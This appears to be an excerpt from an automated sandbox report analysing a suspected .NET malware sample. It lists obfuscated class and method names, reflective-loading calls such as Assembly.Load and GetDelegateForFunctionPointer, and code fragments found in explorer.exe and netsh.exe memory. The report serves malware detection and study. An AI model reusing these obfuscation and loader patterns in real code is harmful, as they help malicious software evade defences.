                Source: Binary string: wntdll.pdbUGP source: hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: hOe2JrpIAE.exe, hOe2JrpIAE.exe, 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.2052359711.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.2050482991.000000000393F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.4442793444.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.cs | .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.cs | .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: hOe2JrpIAE.exe, Main_Panel.cs | .Net Code: InitializeComponent
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.cs | .Net Code: UJfBj2UJXq System.Reflection.Assembly.Load(byte[])
Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.cs | .Net Code: UJfBj2UJXq System.Reflection.Assembly.Load(byte[])
Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, XfJx19P9NihkSJyVVW.cs | .Net Code: UJfBj2UJXq System.Reflection.Assembly.Load(byte[])
Source: 7.2.explorer.exe.1093f840.0.raw.unpack, Main_Panel.cs | .Net Code: InitializeComponent
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 0_2_055BB678 pushad ; ret | 0_2_055BB679
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 0_2_07253262 push es; iretd | 0_2_07253265
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 0_2_07292B5F pushfd ; ret | 0_2_07292B60
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 0_2_07292C15 pushfd ; ret | 0_2_07292C17
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 0_2_072948D2 push 0000007Fh; ret | 0_2_072948D4
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0041406A push edx; ret | 6_2_0041406F
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_00417B13 push ebp; iretd | 6_2_00417B1D
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0041B387 pushad ; ret | 6_2_0041B388
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0041D4B5 push eax; ret | 6_2_0041D508
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0041D56C push eax; ret | 6_2_0041D572
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0041D502 push eax; ret | 6_2_0041D508
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0041D50B push eax; ret | 6_2_0041D572
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0041664B push ds; ret | 6_2_00416661
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0111225F pushad ; ret | 6_2_011127F9
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011127FA pushad ; ret | 6_2_011127F9
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_011409AD push ecx; mov dword ptr [esp], ecx | 6_2_011409B6
Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Code function: 6_2_0111283D push eax; iretd | 6_2_01112858
Source: C:\Windows\explorer.exe | Code function: 7_2_0E4DDB02 push esp; retn 0000h | 7_2_0E4DDB03
Source: C:\Windows\explorer.exe | Code function: 7_2_0E4DDB1E push esp; retn 0000h | 7_2_0E4DDB1F
Source: C:\Windows\explorer.exe | Code function: 7_2_0E4DD9B5 push esp; retn 0000h | 7_2_0E4DDAE7
Source: C:\Windows\explorer.exe | Code function: 7_2_1061A9B5 push esp; retn 0000h | 7_2_1061AAE7
Source: C:\Windows\explorer.exe | Code function: 7_2_1061AB02 push esp; retn 0000h | 7_2_1061AB03
Source: C:\Windows\explorer.exe | Code function: 7_2_1061AB1E push esp; retn 0000h | 7_2_1061AB1F
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_01089C4D push ecx; ret | 8_2_01089C60
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_03C9225F pushad ; ret | 8_2_03C927F9
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_03C927FA pushad ; ret | 8_2_03C927F9
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_03CC09AD push ecx; mov dword ptr [esp], ecx | 8_2_03CC09B6
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_03C9283D push eax; iretd | 8_2_03C92858
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_030CB387 pushad ; ret | 8_2_030CB388
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_030C406A push edx; ret | 8_2_030C406F
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_030C664B push ds; ret | 8_2_030C6661
Source: hOe2JrpIAE.exe | Static PE information: section name: .text entropy: 7.965298829702422
Source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, XG.cs | High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, OV.cs | High entropy of concatenated method names: 'eX9', 'RgtTUJcyZL', 'XXu', 'IXK', 'qX0', 'zXZ', 'Uvdq5j', 'yw', 'Os', 'Bx'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, gSYEfxJ3mWb53dtiApw.cs | High entropy of concatenated method names: 'Yi3HoWc5L7', 'r4XHUHDJSP', 'OCjHjmxt6E', 'jTRkjZWzA6RG2Z8YBNX', 'FNltarn0koU4d8iyLEu', 'VBlBq1n1PBx2faSGeLU'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, uWJe8fBUSmndOswZA9.cs | High entropy of concatenated method names: 'IglJlLW4CR', 'nqLJPFnTWA', 'fyuJhiRNre', 'lCvJwe7qUP', 'wU0JAMmgsd', 'K3QJfKGuj3', 'KoCcECBZbTQFG09ROB', 'ggS0MwriqKgLuSaCQX', 'b5MJJAU2rL', 'Lq0Jy14gi8'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, GpOKynzXxAx0mhsKjJ.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lo4iYF5Gr6', 'CyXiAMdekV', 'fMviftxHZH', 'OTZib6UQSO', 'lqUiaU7jBL', 'ofJiiQlIXy', 'PV4iHIwKKn'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, jKBZbCDWTWf77lE54J.cs | High entropy of concatenated method names: 'YWmY6nvWtR', 'yvGYsZ5XYn', 'XbRYglkFsZ', 'gR9YI75Rpc', 'XEdYTXyBum', 'wwMYKJU4bN', 'Vb2Y8GJ88Y', 'TQjYdbA5pg', 'Y6eYGFKX45', 'phmYXEKLgq'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, w6kQefL8m0YoHQx3Me.cs | High entropy of concatenated method names: 'ToString', 'cU2fXCgBu3', 'QJlfIcgSyk', 'mnyfC2D76n', 'EjEfT3p2Q7', 'MfofKGos0v', 'lPhfnVUx35', 'pQpf8Kjduc', 'dfyfd7iX9L', 'Ll4f55UNYM'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, fqUPcmS4qlWLbVU0Mm.cs | High entropy of concatenated method names: 'cDE0F3qC3P', 'NL40ZtDNKF', 'RKfMC2O34L', 'vtAMT36ij8', 'tyAMKkLlJj', 'rsTMn4WvFc', 'xmBM8SZlu2', 'ENDMdod0eJ', 'XAXM5pY8ff', 'p0HMGsDObd'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, tUoopq5N8vkUC0wdsi.cs | High entropy of concatenated method names: 'nPAloudTWJ', 'kNtlUvUHB0', 'LTcljXJTtb', 'moMlx4h0U0', 'PqulFH69XZ', 'ylTlqrkmGA', 'pDTlZsJPSw', 'CCil6PBqqT', 'iMYlskPYU2', 'IQ1lSGm1Rd'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, mP2gWpWeNb4y9k4ghF.cs | High entropy of concatenated method names: 'Lqcb4Weao1', 't7Rb1nA39L', 'FQPaOmtoRD', 'z6uaJygZYm', 'e52bXdmmLy', 'JMMbRaUDkF', 'ygdbDxgZPJ', 'rWrbmHfpUt', 'Ealbu5si5R', 'umqbLrMxcK'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, Jjt1fo1sfRiO1974xp.cs | High entropy of concatenated method names: 'keAiJin9yY', 'OOuiy4B4nv', 'vnQiBYrNCv', 'Hj8i7CNVn5', 'OjoiQajaQc', 'fNTi0b2ZCW', 'gcJieMYmt5', 'ausatg3rjJ', 'e0Wa4FmkHL', 'iMja2cZDsh'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, T7ThVMJytj6r8Jm6bx6.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gCbHmo6YXb', 'o8ZHucpJvn', 'TgfHLoEYvk', 'KdyH93xOqQ', 'tvhHNFbBfZ', 'WRiHWMdHy8', 'IdrHt9sO0X'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, RRfZn892i9PnkChBY8.cs | High entropy of concatenated method names: 'nembhc0aKy', 'vIAbwclyve', 'ToString', 'jQSb7T7jdD', 'bSbbQEl9FS', 'LxabMOHm3g', 'egnb0m7uF8', 'vqrbeDGfuF', 'yBrblpnjTE', 'FE1bPRtDih'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, pHJXoU8MHljljU27Z9.cs | High entropy of concatenated method names: 'jbRl7yHeS0', 'k2glMA81bF', 'dd3levqyjQ', 'bCFe1wPfbx', 'SSgezYlK52', 'SQnlOg5fjI', 'cHelJ5Gb1G', 'wxQl3wO8fU', 'h1Wly8dMPh', 'on5lBvfR8W'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, fG424W48tRQhx3CopQ.cs | High entropy of concatenated method names: 'XuUa7bTd4o', 'QFfaQMuHb5', 'j4CaMXJ7NJ', 'Wcua0b1dPT', 'bV2aeWuwOO', 'KOLalDGogP', 'cvUaPa9wG0', 'VlRav2mFv4', 'Y8tah1hhon', 'iwMawX0yUI'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, TRDyijQaiyiZRTkxOq.cs | High entropy of concatenated method names: 'Dispose', 'TkXJ2q4hop', 'Dnh3IGPHGX', 'TI4QQOteaK', 'p7GJ1424W8', 'WRQJzhx3Co', 'ProcessDialogKey', 'tQw3Ox1Pfh', 'YWu3J3GVp1', 'kSa33njt1f'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, Gsdn3QgKGuj3ABI1L9.cs | High entropy of concatenated method names: 'DdPecURHqM', 'BsDeQkeXBS', 'EB3e0X8Q5X', 'jlqel3WmDx', 'ziXePyu7m4', 'TkM0N5vpQC', 'uGe0WgM04k', 'y0y0tgJJNM', 'AOk04Bolp2', 'KrE02Trj8H'
Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, XfJx19P9NihkSJyVVW.cs | High entropy of concatenated method names: 'sXNycHJeF9', 'Tpdy7deA27', 'RLsyQ0M60C', 'RE0yMOdeDG', 'DE6y01QY5O', 'RpPyeEBPuI', 'fknyl4wsUS', 'E01yPoo7ag', 'xZIyvOmdra', 'w0tyhPv7y8'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, Qri0x7syuiRNrevCve.csHigh entropy of concatenated method names: 'J2aMxA0UM1', 'B6yMqDFdni', 'tpDM6tDVFl', 'mPSMshdccI', 'O34MAEKjqo', 'pQlMfKV6d4', 'AeHMborSHI', 'QrBMa4nAIt', 'dsbMi07RYD', 'xwLMHakJkF'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, tvOcrl3eIFMEK0gRcO.csHigh entropy of concatenated method names: 'abDj7cM5m', 'QdRxgAyi3', 'iLcqIiUb0', 'RTiZrfX2K', 'Qr6sxfsTp', 'cEoSXov0g', 'v8LZH9gJx5Gh7UvxH2', 'fxsGkOEmfZHALJnd6I', 'pXqNLXqPx37goTvdSS', 'JTPaPMS0i'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, rsRPv9JO8iJZ0C7ddKS.csHigh entropy of concatenated method names: 'aH3iogLVuU', 'HgjiUF1F2A', 'LuqijFmNcF', 'G6mixOE7A8', 'AeWiFvfy80', 'S8piqOQUeA', 'of2iZGnsqX', 'lkei6TIX6N', 'L1QisGbI1H', 'dGriSa8to2'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, vHjLiUmOYvJOUgmPGm.csHigh entropy of concatenated method names: 'GTnAGAiMDn', 'UmAARElWjW', 'm4NAm78BOR', 'rSUAuxnVQQ', 'XPLAIs8dFR', 'tb8ACN10DV', 'T7FATXVx5U', 'oGUAKObAGc', 'hixAn2YyXP', 'wyLA8C05xJ'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, jLW4CR6YqLFnTWAfMo.csHigh entropy of concatenated method names: 'rwqQmtdjy9', 'PUiQu6Ub38', 'sfdQLvdlAZ', 'VI7Q96X73F', 'kqMQNE0nGR', 'wOnQWByQFZ', 'L0gQtC2B6n', 'BkAQ4aW7D7', 'TqHQ2flayW', 'l0nQ1YQ7wv'
                Source: 0.2.hOe2JrpIAE.exe.7420000.13.raw.unpack, nx1Pfh21Wu3GVp1PSa.csHigh entropy of concatenated method names: 'OiWagDlWZd', 'DD8aIfaMm5', 'wHFaCyPw2v', 'wUnaTk55yD', 'tTjamCRrNc', 'UDnaKlsyO6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, OV.csHigh entropy of concatenated method names: 'eX9', 'RgtTUJcyZL', 'XXu', 'IXK', 'qX0', 'zXZ', 'Uvdq5j', 'yw', 'Os', 'Bx'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, gSYEfxJ3mWb53dtiApw.csHigh entropy of concatenated method names: 'Yi3HoWc5L7', 'r4XHUHDJSP', 'OCjHjmxt6E', 'jTRkjZWzA6RG2Z8YBNX', 'FNltarn0koU4d8iyLEu', 'VBlBq1n1PBx2faSGeLU'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, uWJe8fBUSmndOswZA9.csHigh entropy of concatenated method names: 'IglJlLW4CR', 'nqLJPFnTWA', 'fyuJhiRNre', 'lCvJwe7qUP', 'wU0JAMmgsd', 'K3QJfKGuj3', 'KoCcECBZbTQFG09ROB', 'ggS0MwriqKgLuSaCQX', 'b5MJJAU2rL', 'Lq0Jy14gi8'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, GpOKynzXxAx0mhsKjJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lo4iYF5Gr6', 'CyXiAMdekV', 'fMviftxHZH', 'OTZib6UQSO', 'lqUiaU7jBL', 'ofJiiQlIXy', 'PV4iHIwKKn'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, jKBZbCDWTWf77lE54J.csHigh entropy of concatenated method names: 'YWmY6nvWtR', 'yvGYsZ5XYn', 'XbRYglkFsZ', 'gR9YI75Rpc', 'XEdYTXyBum', 'wwMYKJU4bN', 'Vb2Y8GJ88Y', 'TQjYdbA5pg', 'Y6eYGFKX45', 'phmYXEKLgq'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, w6kQefL8m0YoHQx3Me.csHigh entropy of concatenated method names: 'ToString', 'cU2fXCgBu3', 'QJlfIcgSyk', 'mnyfC2D76n', 'EjEfT3p2Q7', 'MfofKGos0v', 'lPhfnVUx35', 'pQpf8Kjduc', 'dfyfd7iX9L', 'Ll4f55UNYM'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, fqUPcmS4qlWLbVU0Mm.csHigh entropy of concatenated method names: 'cDE0F3qC3P', 'NL40ZtDNKF', 'RKfMC2O34L', 'vtAMT36ij8', 'tyAMKkLlJj', 'rsTMn4WvFc', 'xmBM8SZlu2', 'ENDMdod0eJ', 'XAXM5pY8ff', 'p0HMGsDObd'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, tUoopq5N8vkUC0wdsi.csHigh entropy of concatenated method names: 'nPAloudTWJ', 'kNtlUvUHB0', 'LTcljXJTtb', 'moMlx4h0U0', 'PqulFH69XZ', 'ylTlqrkmGA', 'pDTlZsJPSw', 'CCil6PBqqT', 'iMYlskPYU2', 'IQ1lSGm1Rd'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, mP2gWpWeNb4y9k4ghF.csHigh entropy of concatenated method names: 'Lqcb4Weao1', 't7Rb1nA39L', 'FQPaOmtoRD', 'z6uaJygZYm', 'e52bXdmmLy', 'JMMbRaUDkF', 'ygdbDxgZPJ', 'rWrbmHfpUt', 'Ealbu5si5R', 'umqbLrMxcK'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, Jjt1fo1sfRiO1974xp.csHigh entropy of concatenated method names: 'keAiJin9yY', 'OOuiy4B4nv', 'vnQiBYrNCv', 'Hj8i7CNVn5', 'OjoiQajaQc', 'fNTi0b2ZCW', 'gcJieMYmt5', 'ausatg3rjJ', 'e0Wa4FmkHL', 'iMja2cZDsh'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, T7ThVMJytj6r8Jm6bx6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gCbHmo6YXb', 'o8ZHucpJvn', 'TgfHLoEYvk', 'KdyH93xOqQ', 'tvhHNFbBfZ', 'WRiHWMdHy8', 'IdrHt9sO0X'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, RRfZn892i9PnkChBY8.csHigh entropy of concatenated method names: 'nembhc0aKy', 'vIAbwclyve', 'ToString', 'jQSb7T7jdD', 'bSbbQEl9FS', 'LxabMOHm3g', 'egnb0m7uF8', 'vqrbeDGfuF', 'yBrblpnjTE', 'FE1bPRtDih'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, pHJXoU8MHljljU27Z9.csHigh entropy of concatenated method names: 'jbRl7yHeS0', 'k2glMA81bF', 'dd3levqyjQ', 'bCFe1wPfbx', 'SSgezYlK52', 'SQnlOg5fjI', 'cHelJ5Gb1G', 'wxQl3wO8fU', 'h1Wly8dMPh', 'on5lBvfR8W'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, fG424W48tRQhx3CopQ.csHigh entropy of concatenated method names: 'XuUa7bTd4o', 'QFfaQMuHb5', 'j4CaMXJ7NJ', 'Wcua0b1dPT', 'bV2aeWuwOO', 'KOLalDGogP', 'cvUaPa9wG0', 'VlRav2mFv4', 'Y8tah1hhon', 'iwMawX0yUI'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, TRDyijQaiyiZRTkxOq.csHigh entropy of concatenated method names: 'Dispose', 'TkXJ2q4hop', 'Dnh3IGPHGX', 'TI4QQOteaK', 'p7GJ1424W8', 'WRQJzhx3Co', 'ProcessDialogKey', 'tQw3Ox1Pfh', 'YWu3J3GVp1', 'kSa33njt1f'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, Gsdn3QgKGuj3ABI1L9.csHigh entropy of concatenated method names: 'DdPecURHqM', 'BsDeQkeXBS', 'EB3e0X8Q5X', 'jlqel3WmDx', 'ziXePyu7m4', 'TkM0N5vpQC', 'uGe0WgM04k', 'y0y0tgJJNM', 'AOk04Bolp2', 'KrE02Trj8H'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, XfJx19P9NihkSJyVVW.csHigh entropy of concatenated method names: 'sXNycHJeF9', 'Tpdy7deA27', 'RLsyQ0M60C', 'RE0yMOdeDG', 'DE6y01QY5O', 'RpPyeEBPuI', 'fknyl4wsUS', 'E01yPoo7ag', 'xZIyvOmdra', 'w0tyhPv7y8'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, Qri0x7syuiRNrevCve.csHigh entropy of concatenated method names: 'J2aMxA0UM1', 'B6yMqDFdni', 'tpDM6tDVFl', 'mPSMshdccI', 'O34MAEKjqo', 'pQlMfKV6d4', 'AeHMborSHI', 'QrBMa4nAIt', 'dsbMi07RYD', 'xwLMHakJkF'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, tvOcrl3eIFMEK0gRcO.csHigh entropy of concatenated method names: 'abDj7cM5m', 'QdRxgAyi3', 'iLcqIiUb0', 'RTiZrfX2K', 'Qr6sxfsTp', 'cEoSXov0g', 'v8LZH9gJx5Gh7UvxH2', 'fxsGkOEmfZHALJnd6I', 'pXqNLXqPx37goTvdSS', 'JTPaPMS0i'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, rsRPv9JO8iJZ0C7ddKS.csHigh entropy of concatenated method names: 'aH3iogLVuU', 'HgjiUF1F2A', 'LuqijFmNcF', 'G6mixOE7A8', 'AeWiFvfy80', 'S8piqOQUeA', 'of2iZGnsqX', 'lkei6TIX6N', 'L1QisGbI1H', 'dGriSa8to2'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, vHjLiUmOYvJOUgmPGm.csHigh entropy of concatenated method names: 'GTnAGAiMDn', 'UmAARElWjW', 'm4NAm78BOR', 'rSUAuxnVQQ', 'XPLAIs8dFR', 'tb8ACN10DV', 'T7FATXVx5U', 'oGUAKObAGc', 'hixAn2YyXP', 'wyLA8C05xJ'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, jLW4CR6YqLFnTWAfMo.csHigh entropy of concatenated method names: 'rwqQmtdjy9', 'PUiQu6Ub38', 'sfdQLvdlAZ', 'VI7Q96X73F', 'kqMQNE0nGR', 'wOnQWByQFZ', 'L0gQtC2B6n', 'BkAQ4aW7D7', 'TqHQ2flayW', 'l0nQ1YQ7wv'
                Source: 0.2.hOe2JrpIAE.exe.435c150.8.raw.unpack, nx1Pfh21Wu3GVp1PSa.csHigh entropy of concatenated method names: 'OiWagDlWZd', 'DD8aIfaMm5', 'wHFaCyPw2v', 'wUnaTk55yD', 'tTjamCRrNc', 'UDnaKlsyO6', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, gSYEfxJ3mWb53dtiApw.csHigh entropy of concatenated method names: 'Yi3HoWc5L7', 'r4XHUHDJSP', 'OCjHjmxt6E', 'jTRkjZWzA6RG2Z8YBNX', 'FNltarn0koU4d8iyLEu', 'VBlBq1n1PBx2faSGeLU'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, uWJe8fBUSmndOswZA9.csHigh entropy of concatenated method names: 'IglJlLW4CR', 'nqLJPFnTWA', 'fyuJhiRNre', 'lCvJwe7qUP', 'wU0JAMmgsd', 'K3QJfKGuj3', 'KoCcECBZbTQFG09ROB', 'ggS0MwriqKgLuSaCQX', 'b5MJJAU2rL', 'Lq0Jy14gi8'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, GpOKynzXxAx0mhsKjJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lo4iYF5Gr6', 'CyXiAMdekV', 'fMviftxHZH', 'OTZib6UQSO', 'lqUiaU7jBL', 'ofJiiQlIXy', 'PV4iHIwKKn'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, jKBZbCDWTWf77lE54J.csHigh entropy of concatenated method names: 'YWmY6nvWtR', 'yvGYsZ5XYn', 'XbRYglkFsZ', 'gR9YI75Rpc', 'XEdYTXyBum', 'wwMYKJU4bN', 'Vb2Y8GJ88Y', 'TQjYdbA5pg', 'Y6eYGFKX45', 'phmYXEKLgq'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, w6kQefL8m0YoHQx3Me.csHigh entropy of concatenated method names: 'ToString', 'cU2fXCgBu3', 'QJlfIcgSyk', 'mnyfC2D76n', 'EjEfT3p2Q7', 'MfofKGos0v', 'lPhfnVUx35', 'pQpf8Kjduc', 'dfyfd7iX9L', 'Ll4f55UNYM'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, fqUPcmS4qlWLbVU0Mm.csHigh entropy of concatenated method names: 'cDE0F3qC3P', 'NL40ZtDNKF', 'RKfMC2O34L', 'vtAMT36ij8', 'tyAMKkLlJj', 'rsTMn4WvFc', 'xmBM8SZlu2', 'ENDMdod0eJ', 'XAXM5pY8ff', 'p0HMGsDObd'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, tUoopq5N8vkUC0wdsi.csHigh entropy of concatenated method names: 'nPAloudTWJ', 'kNtlUvUHB0', 'LTcljXJTtb', 'moMlx4h0U0', 'PqulFH69XZ', 'ylTlqrkmGA', 'pDTlZsJPSw', 'CCil6PBqqT', 'iMYlskPYU2', 'IQ1lSGm1Rd'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, mP2gWpWeNb4y9k4ghF.csHigh entropy of concatenated method names: 'Lqcb4Weao1', 't7Rb1nA39L', 'FQPaOmtoRD', 'z6uaJygZYm', 'e52bXdmmLy', 'JMMbRaUDkF', 'ygdbDxgZPJ', 'rWrbmHfpUt', 'Ealbu5si5R', 'umqbLrMxcK'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, Jjt1fo1sfRiO1974xp.csHigh entropy of concatenated method names: 'keAiJin9yY', 'OOuiy4B4nv', 'vnQiBYrNCv', 'Hj8i7CNVn5', 'OjoiQajaQc', 'fNTi0b2ZCW', 'gcJieMYmt5', 'ausatg3rjJ', 'e0Wa4FmkHL', 'iMja2cZDsh'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, T7ThVMJytj6r8Jm6bx6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gCbHmo6YXb', 'o8ZHucpJvn', 'TgfHLoEYvk', 'KdyH93xOqQ', 'tvhHNFbBfZ', 'WRiHWMdHy8', 'IdrHt9sO0X'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, RRfZn892i9PnkChBY8.csHigh entropy of concatenated method names: 'nembhc0aKy', 'vIAbwclyve', 'ToString', 'jQSb7T7jdD', 'bSbbQEl9FS', 'LxabMOHm3g', 'egnb0m7uF8', 'vqrbeDGfuF', 'yBrblpnjTE', 'FE1bPRtDih'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, pHJXoU8MHljljU27Z9.csHigh entropy of concatenated method names: 'jbRl7yHeS0', 'k2glMA81bF', 'dd3levqyjQ', 'bCFe1wPfbx', 'SSgezYlK52', 'SQnlOg5fjI', 'cHelJ5Gb1G', 'wxQl3wO8fU', 'h1Wly8dMPh', 'on5lBvfR8W'
                Source: 0.2.hOe2JrpIAE.exe.42ec130.9.raw.unpack, fG424W48tRQhx3CopQ.csHigh entropy of concatenated method names: 'XuUa7bTd4o', 'QFfaQMuHb5', 'j4CaMXJ7NJ', 'Wcua0b1dPT', 'bV2aeWuwOO', 'KOLalDGogP', 'cvUaPa9wG0', 'VlRav2mFv4', 'Y8tah1hhon', 'iwMawX0yUI'
